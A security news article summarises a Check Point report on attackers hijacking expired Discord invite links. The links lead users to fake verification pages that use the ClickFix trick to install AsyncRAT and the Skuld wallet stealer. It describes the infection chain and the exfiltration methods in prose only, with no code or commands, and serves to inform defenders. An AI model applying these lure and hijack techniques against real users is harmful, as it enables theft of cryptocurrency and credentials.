Discord Invite Link Exploitation Facilitates AsyncRAT and Skuld Stealer Deployment Against Cryptocurrency Wallets

A recent malware campaign is leveraging a vulnerability in Discord’s invitation system to distribute an information stealer known as Skuld and the AsyncRAT remote access trojan. Attackers have been using a method called vanity link registration to hijack these links, enabling them to covertly redirect users from trustworthy sources to malicious servers.

According to a technical report from Check Point, the attackers have employed the ClickFix phishing technique along with multi-stage loaders and timed evasions to effectively deliver AsyncRAT and a tailored version of Skuld Stealer that focuses on cryptocurrency wallets. The flaw in Discord’s invite mechanism allows unauthorized entities to seize expired or deleted invite links, leading unsuspecting users to malicious sites, despite the original links having once been considered safe.

This campaign was revealed shortly after Check Point identified another advanced phishing operation that exploited similar tactics, using expired vanity links to lure users into joining a Discord server before directing them to a phishing site that ultimately compromised their digital assets.

Discord’s system allows users to create temporary, permanent, or custom invite links. However, the platform does not permit legitimate servers to reclaim previously expired or deleted invite links. Nevertheless, Check Point has discovered that it is feasible to reuse expired invite codes, and in some instances, even deleted permanent invite codes through the creation of custom links.

The exploitation of this feature raises significant security concerns, as users following once-trusted invite links found on forums or social media can unknowingly connect to fraudulent servers. The hijacking process entails assuming control of legitimate links initially shared by genuine communities, redirecting users to the offender’s server, where they might be prompted to complete a verification process or authorize a bot. This leads them to a deceptive website featuring a “Verify” button.

The attackers enhance their scheme by employing the ClickFix social engineering tactic, persuading users to inadvertently infect their systems under the guise of verification. Upon clicking the “Verify” button, JavaScript executes malicious code that copies a PowerShell command into the clipboard. Users are then encouraged to open the Windows Run dialog and execute this command, inadvertently triggering the download of a malicious script hosted on Pastebin, which subsequently retrieves and runs the first-stage downloader leading to the deployment of AsyncRAT and Skuld Stealer.

This attack showcases a precisely constructed, multi-layer infection strategy crafted for stealth, while also attempting to bypass security protocols by evading sandbox detection. AsyncRAT offers extensive remote control functionalities over compromised machines and employs a dead drop resolver technique to access its command-and-control server via a Pastebin file. The other payload, Skuld, written in Golang, targets sensitive information from Discord and various web browsers, as well as cryptocurrency wallets.

Skuld effectively extracts crypto wallet seed phrases and passwords, particularly from the Exodus and Atomic wallets, through a method known as wallet injection, replacing legitimate application files with trojanized versions. Additionally, the attack utilizes a modified open-source tool, ChromeKatz, to circumvent Chrome’s app-bound encryption protections, sending collected data to the perpetrators via a Discord webhook.

The utilization of trusted cloud services for payload delivery and data exfiltration, such as GitHub, Bitbucket, Pastebin, and Discord, facilitates the attackers in blending with legitimate traffic and evading detection. Although Discord has disabled the malicious bot associated with this campaign, mitigating its effectiveness, Check Point has also detected a separate campaign by the same threat actor that distributes a malicious loader masked as a hacking tool for pirated games.

Victims of these attacks have been identified across several countries, including the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. This situation underscores the ongoing threat to Discord and the exploitation of its CDN infrastructure for malicious purposes.

This campaign exemplifies how a seemingly benign aspect of Discord’s invite system can serve as a vector for sophisticated attacks. By commandeering legitimate invitation links, cybercriminals successfully misdirect users to hazardous Discord servers, with the selection of payloads indicating a deliberate focus on cryptocurrency users motivated by financial gain.